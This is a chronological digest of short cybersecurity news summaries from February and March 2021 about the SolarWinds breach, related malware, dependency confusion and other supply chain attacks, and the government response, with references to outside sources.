_______________________________________________________________________________________

(March 22, 2021)


The ‘Frankencloud’ model is the biggest security risk

According to a researcher, the information technology environments evolve into the “Frankenstein” approach. Firms scrambled to take advantage of the cloud while maintaining their systems of record. This led to systems riddled with complexity and disconnected parts put together.

Ref - TechCrunch

_______________________________________________________________________________________

(March 22, 2021)


The SolarWinds victims are now solidified

Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, said that the list of victims from the attack on SolarWinds Orion has "solidified" and he is not expecting many more organizations to come forward. CISA is continuing to work with federal agencies to understand if any have been compromised.

Ref - FCW

_______________________________________________________________________________________

(March 22, 2021)


A report about SilverFish cyber-espionage group

The PRODAFT Threat Intelligence Team has published a report that gives an unusually clear look at the size and structure of organized cybercrime. It uncovered a global cybercrime campaign that uses modern management methods, sophisticated tools including its own malware testing sandbox. It has strong ties with the SolarWinds attack, the EvilCorp group, and some other well-known malware campaigns.


_______________________________________________________________________________________

(March 22, 2021)


Shell is another victim of the Accellion supply chain hack

Energy giant Shell has disclosed a data breach (via Supply Chain attack) after attackers compromised the company's secure file-sharing system powered by Accellion's File Transfer Appliance (FTA). Upon learning of the incident, the firm - Shell - addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.


_______________________________________________________________________________________

(March 22, 2021)


The new insider threat of compromised partners

The current rash of financial fraud and supply chain attacks exploit a seemingly unsolvable vulnerability in security strategy. Attackers exploit the fact that a firm must communicate with its outside partners and vendors to thrive as a company or an institution. As they interact with partners, the door to exploitation opens, specifically in the form of supply chain attacks. These attacks are tremendously hard to detect since malware and malicious links are not necessary for successful exfiltration.


_______________________________________________________________________________________

(March 22, 2021)


Three vulnerabilities exposed during SolarWinds attack

SolarWinds attackers leveraged three key vulnerabilities in the current IT ecosystem. They leveraged the supply chain weakness, injecting malware in the supplier network to gain access to the core network. Besides, they took advantage of single sign-on systems, and also exploited the traditional multifactor authentication systems.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 22, 2021)


In wake of SolarWinds, Exchange attacks, the U.S. government calls for better information sharing

The new cybersecurity leadership in the Biden White House is brainstorming methods to establish new early warning systems that combine traditional intelligence agency methods with private sector expertise. Reportedly chief among the new approaches is establishing more profound information-sharing methods with the private sector.

Ref - CSO Online 

_______________________________________________________________________________________

(March 22, 2021)


KPMG advisory on SolarWinds attack

According to the recent KPMG advisory, each malware used during SolarWinds had a tactical purpose. SUNSPOT was designed by the threat actor(s) to function specifically within SolarWinds’ software build environment to insert a malicious backdoor called SUNBURST. TEARDROP and RAINDROP were designed to be used by the threat actor(s) to deploy a modified version of Cobalt Strike. Further, SUNSHUTTLE/GoldMax, GoldFinder, and Sibot are malicious tools reported to have been used by threat actor(s) in an environment where there was a pre-existing SUNBURST compromise.

Ref - KPMG

_______________________________________________________________________________________

(March 21, 2021)

How to prevent supply chain attacks?

The key to mitigating supply chain security risks is to ensure each of your third-party vendors is compliant with the strictest of cybersecurity standards, whether or not regulatory requirements are enforced. Complacency is the primary impetus to supply chain attack vulnerability. To keep third-party vendors compliant, security questionnaires should be sent to each of them on a regular basis to continuously scrutinize their security posture.

Ref - UpGuard

_______________________________________________________________________________________

(March 21, 2021)


CISA releases a tool to detect SolarWinds malicious activity

The U.S. CISA has released a new tool (CISA Hunt and Incident Response Program or CHIRP) that allows detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments. It is a forensics collection tool that CISA developed to help network defenders find IOCs associated with activity detailed in the following CISA Alerts.


_______________________________________________________________________________________

(March 20, 2021)


SolarWinds is a major disaster in the modern era of computing

Researcher Davi Ottenheimer has compared the SolarWinds attack with a Dust Bowl disaster. According to him, Microsoft for so many years worked on an extremely expedited model with minimal security or ecosystem investment inviting a predictable disaster.


_______________________________________________________________________________________

(March 20, 2021)


A Swiss firm has accessed servers of a SolarWinds hacker

A Swiss cybersecurity firm says it has accessed servers used by a hacking group (Silverfish) tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation. The firm, PRODAFT, also said the hackers have continued with their campaign through this month.

Ref - ProDaft

_______________________________________________________________________________________

(March 18, 2021)


Xcode Project spreading MacOS malware to Apple developers

Cybercriminals are targeting Apple developers with a trojanized Xcode project, which once launched installs a backdoor that has spying and data exfiltration capabilities. The malicious Xcode project, which researchers call XcodeSpy, installs a variant of the known EggShell backdoor on the developer’s macOS computer. 


_______________________________________________________________________________________

(March 18, 2021)


CISA releases detection tool for SolarWinds malicious activity 

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to detect post-compromise malicious activity associated with the SolarWinds hackers in on-premises enterprise environments. CISA Hunt and Incident Response Program (CHIRP), the new forensics collection tool, is a Python-based tool that helps detect SolarWinds malicious activity IOCs on Windows operating systems.


_______________________________________________________________________________________

(March 18, 2021)

SolarWinds-linked threat group SilverFish took advantage of enterprise victims

A Swiss cybersecurity firm Prodaft said that SilverFish, a threat group, has been responsible for intrusions at over 4,720 private and government organizations including Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers. SilverFish has been connected to the recent SolarWinds breach as "one of many" threat groups taking advantage of the situation.

Ref - ZDNet

_______________________________________________________________________________________

(March 18, 2021)


Beware the Package Typosquatting Supply Chain Attack

Attackers are mimicking the names of existing packages on public registries in hopes that users or developers will accidentally download these malicious packages instead of legitimate ones. In this attack, the attacker tries to mimic the name of an existing package on a public registry in hopes that users or developers will accidentally download the malicious package instead of the legitimate one.


_______________________________________________________________________________________

(March 18, 2021)


XcodeSpy malware can target iOS devs in a supply chain attack

A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply chain attack to install a macOS backdoor on the developer's computer. Like other development environments, it is common for developers to create projects that perform specific functions and share them online so that other developers can add them to their own applications.


_______________________________________________________________________________________

(March 18, 2021)


NSA, Homeland Security push service to mitigate cyber-attacks

The National Security Agency and the Department of Homeland Security are encouraging government agencies and high-risk companies to embrace a system known as Protective DNS, in which a private security firm would monitor and filter web traffic. PDNS blocked connections to malicious websites millions of times in a recent test involving five U.S. defense contractors.

Ref - Bloomberg
 
_______________________________________________________________________________________

(March 18, 2021)


Will the U.S. never be safe from cyberattacks?

While Washington grapples with how to prevent another attack of this scale (SolarWinds breach), the hard truth is this: There’s no such thing as a foolproof cybersecurity defense. Because human beings write computer code. And despite being incredibly smart, those people make mistakes. And each minuscule error creates one more pathway for hackers to launch cyberattacks.

Ref - Yahoo

_______________________________________________________________________________________

(March 18, 2021)


Rethinking Patch management after SolarWinds breach

The SolarWinds breach, in which hackers inserted malware into software updates sent to thousands of customers and created a backdoor to their IT systems, suggests organizations need to rethink patch management. To identify known and potential vulnerabilities, security leaders need a software bill of materials (SBOM) for software and devices deployed into their environment, as well as for new updates and patches.


_______________________________________________________________________________________

(March 17, 2021)


Zero-trust helped Splunk dodge supply chain attack

Events like the SolarWinds breach are reminders of how important it is for organizations, especially high-profile organizations in industry and government to have a zero-trust architecture in place. A lot of organizations are building out a very in-depth set of data analytics capabilities, as a part of a broader zero-trust strategy. And then taking advantage of those things to improve visibility and security operations.


_______________________________________________________________________________________

(March 17, 2021)


SolarWinds attackers gained access to Mimecast’s production environment

Mimecast acknowledged that the threat actor responsible for the SolarWinds attack used the supply chain compromise to gain entry to a part of Mimecast’s production grid environment, accessing certain Mimecast-issued certificates and related customer-server-connection information.

Ref - SC Media

_______________________________________________________________________________________

(March 17, 2021)


Lawmakers drilled multiple agencies for SolarWinds attack

The bipartisan leaders of a House panel drilled multiple agencies for updates on the SolarWinds hack, a mass cyber campaign that compromised at least nine federal agencies and 100 private sector groups. Members of the Energy and Commerce Committee sent letters demanding answers to the leaders of the departments of Commerce, Energy, Health and Human Services, as well as the Environmental Protection Agency.

Ref - The Hill

_______________________________________________________________________________________

(March 17, 2021)


Spotting APT Activity associated with SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures used by the advanced persistent threat (APT) actor involved with the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify APT TTP and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.

Ref - CISA

_______________________________________________________________________________________

(March 17, 2021)


Key takeaways for security admins from SolarWinds attacks

Security and IT admins can take note of several key points regarding supply chain attacks. It can be said that potential supply chain attack victims lack access to the right tools. The golden SAML attack allowed attackers to jump from on-premises systems to cloud systems effectively bypassing MFA, thus showing the weaknesses in current authentication systems.

Ref - CSO Online 

_______________________________________________________________________________________

(March 17, 2021)


How the Linux Foundation’s software signing combats supply chain attacks

The Linux Foundation is launching sigstore, a free service jointly developed with Google, Red Hat, and Purdue University, that software developers can use to digitally sign their software releases. sigstore protects open source consumers from such attacks as dependency confusion attacks. These attacks dupe package managers into installing a remotely-hosted malicious version of a locally-available resource such as a library file.


_______________________________________________________________________________________

(March 16, 2021)


Biden's supply chain EO may uncover these cyber risks

While the government continues to assess the scope and scale of that breach, the White House is now directing various executive departments to assess the risks in their respective supply chains. The executive order calls for both 100-day immediate reviews of certain products, as well as year-long sectoral supply chain reviews of the defense, health, transportation, and agriculture industries, among others.

Ref - FCW 

_______________________________________________________________________________________

(March 16, 2021)


Mimecast decommissioned SolarWinds Orion after hack

The Lexington, Mass.-based email security vendor - Mimecast - became one of the first SolarWinds hack victims to publicly announce they’re dumping the industry-leading Orion network monitoring platform for a competing product. Industry experts had considered it unlikely that the hack would lead to many customers getting rid of SolarWinds due to the unique visibility and monitoring features Orion offers.

Ref - CRN

_______________________________________________________________________________________

(March 16, 2021)


SolarWinds underestimated network’s role in security

According to Juniper Networks VP of Security Business and Strategy Samantha Madrid, the SolarWinds hack has put a fine point on the importance of network security. While the full scope of the supply chain attack remains under investigation, it brought network visibility and the need for security enforcement at every point of connection into sharper focus.


_______________________________________________________________________________________

(March 16, 2021)


Using CodeQL to spot traces of Solorigate

If a build server is backdoored with the build hijacking component of the Solorigate malware campaign, the malware will inject additional source code at compilation time. If CodeQL is observing the build process on the infected server, it will extract the injected malicious source code together with the genuine source code. The resulting CodeQL database will therefore contain traces of the malicious Solorigate source code.

Ref - GitHub

_______________________________________________________________________________________

(March 16, 2021)


Mimecast confirms that SolarWinds hackers used Sunburst malware for initial intrusion

Mimecast has confirmed that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion. Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information.


_______________________________________________________________________________________

(March 16, 2021)


How to prevent supply chain attacks?

Here are 11 cybersecurity strategies that could help prevent supply chain attacks - implement honeytokens, secure privileged access management, implement a Zero trust architecture, assume about suffering a data breach, identify all potential insider threats and protect vulnerable resources, minimize access to sensitive data, implement strict shadow IT rules, send regular third-party risk assessments, monitor vendor network for vulnerabilities, and identify all vendor data leaks.

Ref - UpGuard

_______________________________________________________________________________________

(March 16, 2021)


Software supply chain attacks are not easy to tackle

As companies scramble to investigate whether their own systems and data were potentially impacted by the SolarWinds compromise, executives, boards, and customers are discovering that the threat of supply chain attacks expands beyond this one single incident and that mitigating the risks associated with them is not straightforward.


_______________________________________________________________________________________

(March 15, 2021)


Security ratings could raise the bar on cyber hygiene

Plans from the Biden administration to release a product security rating system could raise the bar for security overall but won’t likely prevent the next SolarWinds or Microsoft hacks. Experts say the simplicity of that concept is both its strength and its weakness: it’s a concept that is easy to understand and could drive compliance with a set of standards, but it won’t prevent more sophisticated attacks.


_______________________________________________________________________________________

(March 15, 2021)


Better security approach against supply chain attacks 

An effective procurement language should be developed, which is designed to hold a supplier or other third party contractually liable for the statements they make about the quality, reliability, and security of the software they are providing. Organizations need to consider the software and service provider processes when discussing a partnership and defining what security measures will be implemented.

Ref - Medium

_______________________________________________________________________________________

(March 15, 2021)


TIA reveals new global supply chain security standard - SCS 9001

The Telecommunications Industry Association (TIA) has published a new white paper on SCS 9001, the first process-based supply chain security standard for the information communications technology (ICT) industry. Scheduled to release later this year, the new standard will be measurable and verifiable as a means for service providers, manufacturers, and vendors to ensure that their supply chains meet the critical requirements needed to mitigate the risk of cybersecurity breaches and attacks.

Ref - Yahoo 

_______________________________________________________________________________________

(March 15, 2021)


SolarWinds attacks recovery could take the U.S. government 18 months

Brandon Wales, acting director of CISA, said that the U.S. government’s recovery effort from the SolarWinds supply chain attack could take well into 2022. This prediction reflects the complex nature of the breach and the length of time during which the attackers hid in their victims’ networks.


_______________________________________________________________________________________

(March 14, 2021)


White House seeks new cybersecurity approach after failing to detect hacks

The sophisticated hacks pulled off by Russia and China against a broad array of government and industrial targets in the United States and the failure of the intelligence agencies to detect them are driving the Biden administration and Congress to rethink how the nation should protect itself from growing cyber threats. Both attacks were run from inside the USA’s domestic servers, putting them out of reach of the NSA’s early warning system.


_______________________________________________________________________________________

(March 14, 2021)

Software Bill Of Materials: an efficient mitigation strategy for supply chain attacks

There is an efficient mitigation strategy for supply chain attacks: the bill of materials, or “BOM”. In its simplest form, the BOM is similar to a long list of ingredients, in which all materials and quantities needed to manufacture an end product are listed. If the “BOM” is done with great precision, it is possible to provide deep insight into the product and all its parts and its corresponding supply chain vulnerabilities.

Ref - Medium

_______________________________________________________________________________________

(March 13, 2021)


Security best practices after SolarWinds supply chain attack

Implementing the supply chain security best practices can help mitigate third-party risk and meet the needs of the changing enterprise ecosystem. Users are recommended to conduct asset and access inventories, elevate third-party risk management and ensure third-party relationships are collaborative.


_______________________________________________________________________________________

(March 12, 2021)


A senior administration official on the response to the Microsoft and SolarWinds intrusions

According to a senior administration official, they are in week three of four-week remediation across the federal government. The compromised agencies were all tasked to do a particular set of activities and then were tasked to have an independent review of their work to ensure the adversary had been eradicated. Most of the agencies have completed that independent review and the rest will complete it by the end of March.


_______________________________________________________________________________________

(March 12, 2021)


SolarWinds and Microsoft hacks spark debate over western retaliation

Cyber experts have cautioned that retaliation steps against SolarWinds and Microsoft hacks may not be justified. The SolarWinds and Microsoft hacks are not incidences of conflict in any sort of conventional sense, they’re espionage, so they’re part of continual interaction between these states.


_______________________________________________________________________________________

(March 12, 2021)


The first-ever U.S. national cyber director after SolarWinds breach

The new national cyber director will be responsible for crafting a national cyber strategy as well as driving more consistency across civilian government networks. If disaster strikes, the director will serve as the point person in coordinating the government’s nonmilitary response. 

Ref - Fortune

_______________________________________________________________________________________

(March 11, 2021)


Risks of supply chain attacks for organizations

Supply chain security risks are not new, but recent headlines are a reminder for consumers to re-examine their security practices. The SolarWinds/Orion cyberattack had impacted more than 18,000 organizations, and it might serve as the major point of attention for dealing with digital supply chain risks.

Ref - Synopsys

_______________________________________________________________________________________

(March 11, 2021)


Managing supply chain security risk 

After the SolarWinds attack, it is important that information security and risk management teams need to think beyond third-party and vendor risk management. Supply chain risk management should be built on existing standardized practices across many existing risk practices and disciplines. It also requires cooperation and collaborative relationships within all areas of the organization.


_______________________________________________________________________________________

(March 11, 2021)


Embedded devices are a blind spot in the SolarWinds attack

The SolarWinds attackers accessed the network, be it Office 365 or VMware, and a separate campaign that exploited a bug in SolarWinds. However, the industry is overlooking a more nefarious but equally plausible objective: Attackers may have used SolarWinds as a pathway into key networks where they could access and burrow deep into the embedded devices in industrial control systems.

Ref - The Hill

_______________________________________________________________________________________

(March 11, 2021)


Nation-state hackers exploited the U.S. Internet security gap

U.S. lawmakers and security experts are voicing concern that foreign governments are staging cyberattacks using servers in the U.S., in an apparent effort to avoid detection by America’s principal cyberintelligence organization. When hackers recently targeted servers running Microsoft Corp.’s Exchange software, they employed U.S.-based computers from at least four service providers to mount their attack, according to an analysis by the threat intelligence company DomainTools LLC.


_______________________________________________________________________________________

(March 10, 2021)


Risks of integrating technology vulnerabilities into the foundational technology

SolarWinds attacks and other events in 2020 spotlight a new burden to manage for C-Suites/Boards: The malicious supply chain influences of nation-state intelligence services. In recent supply chain attacks, the adversaries are not just finding & exploiting technology vulnerabilities, but actually creating & integrating them into the foundational technology. 

Ref - Forbes

_______________________________________________________________________________________

(March 10, 2021)


Hacker group claims access to internal video feeds by compromising supplier

Hackers said they accessed internal video feeds at several companies, including Tesla Inc., and at public agencies by breaching the network of security-camera vendor Verkada Inc., the latest cybersecurity incident in which a supplier unwittingly opened a back door into client networks. The group found a username and password for a Verkada administrative account on the internet, permitting them to obtain the footage.


_______________________________________________________________________________________

(March 10, 2021)


How to beat the new breed of Supply Chain attacks

The plethora of new malware strains (e.g., SUNBURST, SUPERNOVA, GoldMax, Sibot, and GoldFinder) that have emerged in the wake of the SolarWinds breach should force all enterprises to take the supply chain attack vector seriously. Comparing traditional supply chain attacks with the recent SolarWinds and Microsoft hacks, it is clear that attackers have upped their game to a whole new level, both in sophistication and tactics.

Ref - SentinelOne 

_______________________________________________________________________________________

(March 10, 2021)


Monitoring the software supply chain in Microsoft environment

Microsoft has described ways to monitor the software development, build, and release process via Azure Sentinel, specifically to detect any NOBELIUM-related activity. The blog uses Microsoft’s security monitoring solution Azure Sentinel, and Microsoft’s cloud CI/CD solution Azure DevOps as the focus point, however, the monitoring principles and approaches could also be applied to other technology stacks.

Ref - Microsoft 

_______________________________________________________________________________________

(March 10, 2021)


SolarWinds is not an isolated event going forward - VMware Report

The 2021 Global Cybersecurity Outlook report from VMware Security Business Unit suggests that “island-hopping” attacks are on a rise, in which attackers jump from one network to another along a supply chain, as occurred in the SolarWinds attack. Organizations have to realize that it’s no longer simply about whether breaches along their supply chains can be leveraged to attack them, but whether they themselves can be used to attack their customers.


_______________________________________________________________________________________

(March 9, 2021)


The inside story of the stealthy SolarWinds SUNBURST attack

The SolarWinds attack was performed without weaponizing a (yet known) zero-day vulnerability. The attackers were able to make their malicious version of the SolarWinds Orion DLL look like a normal version of the software. It was virtually impossible to detect because everything looked official. But as they begin to move through a network by accessing new accounts, a lack of normal behavior of all these targeted users and devices they’re operating opens a new window of opportunity for detection.

Ref - Varonis 


_______________________________________________________________________________________

(March 9, 2021)


The separate SolarWinds attack described by researchers

Russian hackers apparently weren't the only ones targeting SolarWinds customers. Researchers from Secureworks discovered the ‘Spiral’ attack on one organization in November 2020, when they spotted hackers exploiting a SolarWinds Orion API vulnerability on an internet-facing SolarWinds server during an incident response effort. Spiral's activities are separate from the SolarWinds supply chain compromise first reported in December 2020


_______________________________________________________________________________________

(March 9, 2021)


Microsoft released a patch for older versions of Exchange

Microsoft has released security updates for unsupported versions of Exchange email servers following widespread attacks exploiting four newly discovered security vulnerabilities. The security updates for older versions of Exchange only address the four newly disclosed flaws that are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The issues affect on-premise Exchange servers.

Ref - ZDNet

_______________________________________________________________________________________

(March 9, 2021)


Implications of recent supply chain attacks

The implications of SolarWinds have made all CSOs rethink their approach to cybersecurity. For decades, manufacturing equipment would operate in isolation from public networks to keep adversarial agents from gaining access and potentially disrupting operations. However, as supply chains became more intertwined with operations, third parties were granted access to those systems in order to automate the ordering and fulfillment of maintenance and materials.

Ref - Forbes

 _______________________________________________________________________________________

(March 9, 2021)


Analysis of the biggest Python supply chain attack ever

On March 1st, 2021, a newly created account on the Python Package Index PyPI uploaded 3591 new packages. Each package had a name that closely resembled the name of another popular package. However, the script is only signaling to someone that it was successfully downloaded and installed but does nothing beyond that. This could be the work of a security researcher who wanted to raise awareness about typosquatting supply chain attacks, by publishing a lot of fake packages and collecting statistics about how many times each one was downloaded.

Ref - Sogeti

_______________________________________________________________________________________

(March 9, 2021)


More clues appear to link Supernova web shell activity to China

According to Secureworks' new report, the authentication bypass vulnerability in SolarWinds Orion API, tracked as CVE-2020-10148, that can lead to remote execution of API commands, has been actively exploited by Spiral. When vulnerable servers are detected and exploited, a script capable of writing the Supernova web shell to disk is deployed using a PowerShell command.

Ref - TechRadar 

_______________________________________________________________________________________

(March 8, 2021)


‘Retaliation’ for Russia's SolarWinds spying might not be a good idea for the US

Before the US mounts a saber-rattling counterattack, it should pin down exactly what line Russia crossed. Any rule that could justify SolarWinds' retaliation is one that the US also violates with its own cyberespionage. And there's still no evidence that Russia's hacking, in this case, went beyond stealthy intelligence gathering of the sort the US performs routinely around the world.

Ref - Wired 

_______________________________________________________________________________________

(March 8, 2021)


Hackers who hid Supernova malware in SolarWinds Orion linked to China

Intrusion activity related to the Supernova malware, that was planted on compromised SolarWinds Orion installations exposed on the public internet, points to an espionage threat actor based in China. Security researchers named this hacker group ‘Spiral’ and correlated findings from two intrusions in 2020 on the same victim network to determine activity from the same intruder.


_______________________________________________________________________________________

(March 8, 2021)


SolarWinds Breach: Supernova malware linked to a China-based threat group

Secureworks' counter-threat unit (CTU) said that during late 2020, a compromised Internet-facing SolarWinds server was used as a springboard to deploy Supernova, a .NET web shell. Similar intrusions on the same network suggest that the Spiral threat group, suspected of a Chinese origin, is to blame for both cases. According to the researchers, CVE-2020-10148 has been actively exploited by Spiral.

Ref - ZDNet

_______________________________________________________________________________________

(March 8, 2021)


A supply chain attack is targeting the Python community with 4000 fake modules

A user has uploaded 3951 utterly bogus PyPI packages, the names of which resemble the near-miss domain names of several genuine Python Packages. None of these fake packages contained outright malware, or indeed any permanent package code at all. However, some of them (if not all) included a Python command that was intended to run when the package was installed, rather than when it was used.

Ref - Sophos

_______________________________________________________________________________________

(March 6, 2021)


This new type of supply-chain attack has serious consequences 

A new type of supply chain attack (dubbed Dependency Confusion) unveiled last month is targeting more and more companies, with new rounds this week taking aim at Microsoft, Amazon, Slack, Lyft, Zillow, and an unknown number of others. In weeks past, Apple, Microsoft, Tesla, and 32 other companies were targeted by a similar attack that allowed a security researcher to execute unauthorized code inside their networks.


_______________________________________________________________________________________

(March 5, 2021)


A supply chain attack has breached multiple airlines

A communications and IT vendor for 90 percent of the world’s airlines, SITA, has been breached, compromising passenger data stored on the company’s U.S. servers in what the company is calling a highly sophisticated attack. The affected servers are in Atlanta and belong to the SITA Passenger Service System (SITA PSS).


_______________________________________________________________________________________

(March 5, 2021)


Singapore is the latest victim of supply chain attack

An aviation IT company, that says it serves 90% of the world's airlines, has been breached in what appears to be a coordinated supply chain attack. Customers of at least four companies - Malaysia Airlines, Singapore Airlines, Finnair Airlines, and Air New Zealand - may have been affected by the incident.


_______________________________________________________________________________________

(March 5, 2021)


Microsoft is now adopting an aggressive strategy for sharing SolarWinds hack intel

Rob Lefferts, corporate vice president for Microsoft 365 Security in Security and Compliance, explains the company's approach to keeping its customers and the industry apprised and updated on its findings from the now-infamous SolarWinds attack. In the wake of a widespread cyberattack, enterprise IT providers can play a key role in how businesses learn about and mitigate the security threat.


_______________________________________________________________________________________

(March 5, 2021)


SolarWinds: 30,000 organizations' email hacked via Microsoft Exchange Server vulnerabilities 

Four exploits found in Microsoft’s Exchange Server software have reportedly led to over 30,000 US governmental and commercial organizations having their emails hacked, according to a report by KrebsOnSecurity. The vulnerabilities allowed hackers to gain access to email accounts, and also gave them the ability to install malware that might let them back into those servers at a later time.

Ref - The Verge

_______________________________________________________________________________________

(March 4, 2021)


Researchers disclosed additional malware linked to SolarWinds attackers

Researchers with Microsoft and FireEye found three new malware families (named as GoldMax, Sibot, and GoldFinder), which they said are used by the threat group behind the SolarWinds attack. Researchers have uncovered more custom malware that is being used by the threat group behind the SolarWinds attack.


_______________________________________________________________________________________

(March 3, 2021)


Malicious code bombs are targeting Amazon, Lyft, Slack, Zillow via supply chain attacks

Attackers have weaponized code dependency confusion to target internal apps at tech giants. Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack, and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.


_______________________________________________________________________________________

(March 3, 2021)


SolarWinds breach showed increased sophistication of advanced threat actors

Microsoft has highlighted the increasingly sophisticated cyber-threat landscape, particularly as a result of the rise in nation-state attacks. During a session at the Microsoft Ignite event, the company outlined some of the trends it is seeing and actions it is taking to help mitigate them in the future.


_______________________________________________________________________________________

(March 2, 2021)


SolarWinds breach cost $3.5 million in expenses 

SolarWinds has reported expenses of $3.5 million from last year's supply-chain attack, including costs related to incident investigation and remediation. Further expenses were recorded by SolarWinds after paying for legal, consulting, and other professional services related to the December hack and provided to customers for free.


_______________________________________________________________________________________

(March 1, 2021)


Dependency Confusion is being used to create copycat packages

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature. These squatted packages are named after repositories, namespaces, or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

Ref - Sonatype

_______________________________________________________________________________________

(March 2, 2021)


The SolarWinds hack compromised NASA and FAA

In addition to infiltrating the unclassified networks of seven other US government agencies, the suspected Russian hackers who compromised the IT services firm SolarWinds as a jumping-off point also penetrated NASA and the Federal Aviation Administration. The seven other breached agencies are the Departments of Commerce, Homeland Security, Energy, and State, the US Treasury, the National Institutes of Health, and the Justice Department. The White House said earlier this month that hackers also compromised 100 companies in the spree.

Ref - Wired

_______________________________________________________________________________________

(February 25, 2021)

Microsoft now sharing CodeQL queries for scanning SolarWinds-like implants code

Microsoft has open-source CodeQL queries that developers can use to scan source code for malicious implants matching the SolarWinds supply-chain attack. To make sure the attackers did not modify their code, Microsoft created CodeQL queries that were used to scan their codebase for malicious implants matching the SolarWinds IOCs.


_______________________________________________________________________________________

(February 25, 2021)


Security experts were blindsided by the SolarWinds attack

The SolarWinds cyberattack on U.S. government agencies and private organizations was and is frightening in its scale and success. It proved no match for the government agencies charged with defending against such things and brought into sharp focus the fact that the government’s current model for responding to cyber threats is lacking. In a sense, the SolarWinds attack seemed designed to exploit a lack of communication and cooperation between government and private-sector security experts.

Ref - Medium

_______________________________________________________________________________________

(February 25, 2021)


SolarWinds hackers take advantage of Amazon Elastic Compute Cloud

Amazon Web Services admitted that hackers used its systems in the SolarWinds campaign but reiterated the cloud computing giant wasn’t itself infected with malware. The actors used EC2 [Amazon Elastic Compute Cloud] just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner.

Ref - CRN

_______________________________________________________________________________________

(February 24, 2021)


SolarWinds breach is one of the biggest attacks ever - US Senate committee

The United States Senate's select committee on intelligence met to hear evidence from tech executives regarding the historic hack on Texas-based company SolarWinds. The committee heard that both the scale and sophistication of the attack were greater than had been previously thought.


_______________________________________________________________________________________

(February 24, 2021)


More SolarWinds breach victims could still be undisclosed

Microsoft believes that the SolarWinds hackers may have used up to a dozen different means of getting into victims’ networks over the past year, a higher estimate than previously understood. It is likely that more brand-name players may have been penetrated by the SolarWinds breach. They are not forthcoming as other victims did, thus leaving policymakers and potential customers in the dark.

Ref - WSJ

_______________________________________________________________________________________

(February 24, 2021)


Important takeaways from the US Senate's hearing of SolarWinds breach

The Senate Intelligence Committee held its first public hearing on the SolarWinds hack and there are five key takeaways- fingers pointed to Russia as the hack's perpetrator and companies want the US to hold Russia accountable. Amazon was a no-show despite being invited, and lawmakers weren't happy about it. Lawmakers and tech leaders agreed that there should be more robust information-sharing around cyber threats. A new law setting standards for breached companies could be on the horizon. In addition, the hearings showed cooperation between the government and industry.


_______________________________________________________________________________________

(February 24, 2021)


SolarWinds hackers targeted NASA and Federal Aviation Administration networks

Hackers are said to have broken into the networks of U.S. space agency NASA and the Federal Aviation Administration as part of a wider espionage campaign targeting U.S. government agencies and private companies. The two agencies were named by the Washington Post, hours ahead of a Senate Intelligence Committee hearing tasked with investigating the widespread cyberattack.


_______________________________________________________________________________________

(February 24, 2021)


There is substantial evidence of Russian involvement in SolarWinds breach

Microsoft directly blamed Russia's foreign intelligence service for the devastating security breach of at least nine federal agencies and dozens of private businesses, going further than US government officials have to date in their public attribution for the hack. Microsoft President Brad Smith said it would likely take time for the US government to formally reach the same conclusion.

Ref - CNN

_______________________________________________________________________________________

(February 23, 2021)


SolarWinds attackers stayed for several months in FireEye's network

The attackers who infiltrated SolarWinds Orion's software build and updates had spent several months embedded in FireEye's network. The attacker wasn't alive every single day on their network, Kevin Mandia, CEO of FireEye told the US Senate Intelligence Committee in response to a question about the attack time frame on FireEye's network.


_______________________________________________________________________________________

(February 23, 2021)


Finding answers on the SolarWinds breach

Key senators and corporate executives warned at a hearing on SolarWinds breach that the “scope and scale” of the recent hacking of government agencies and companies, the most sophisticated in history, were still unclear. The National Security Agency, despite spending billions of dollars planting sensors in networks around the world, missed the evidence for more than a year.


_______________________________________________________________________________________

(February 23, 2021)


AWS infrastructure was used in SolarWinds hack

Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack. Specifically, Amazon Web Services hosted most of the secondary command and control nodes in the SolarWinds attack.

Ref - CRN

_______________________________________________________________________________________

(February 23, 2021)


Mandatory breach disclosure in wake of SolarWinds breach

Lawmakers and witnesses at the Senate Intelligence Committee’s hearing on SolarWinds emphasized the possibility of legislation mandating certain businesses to disclose some breaches to the federal government. Currently, there is no rule mandating a company like FireEye to disclose a breach to the federal government, even when national security is a concern.

Ref - SCMagazine

_______________________________________________________________________________________

(February 23, 2021)


There could be more tech firms besides SolarWinds - used to hack targets<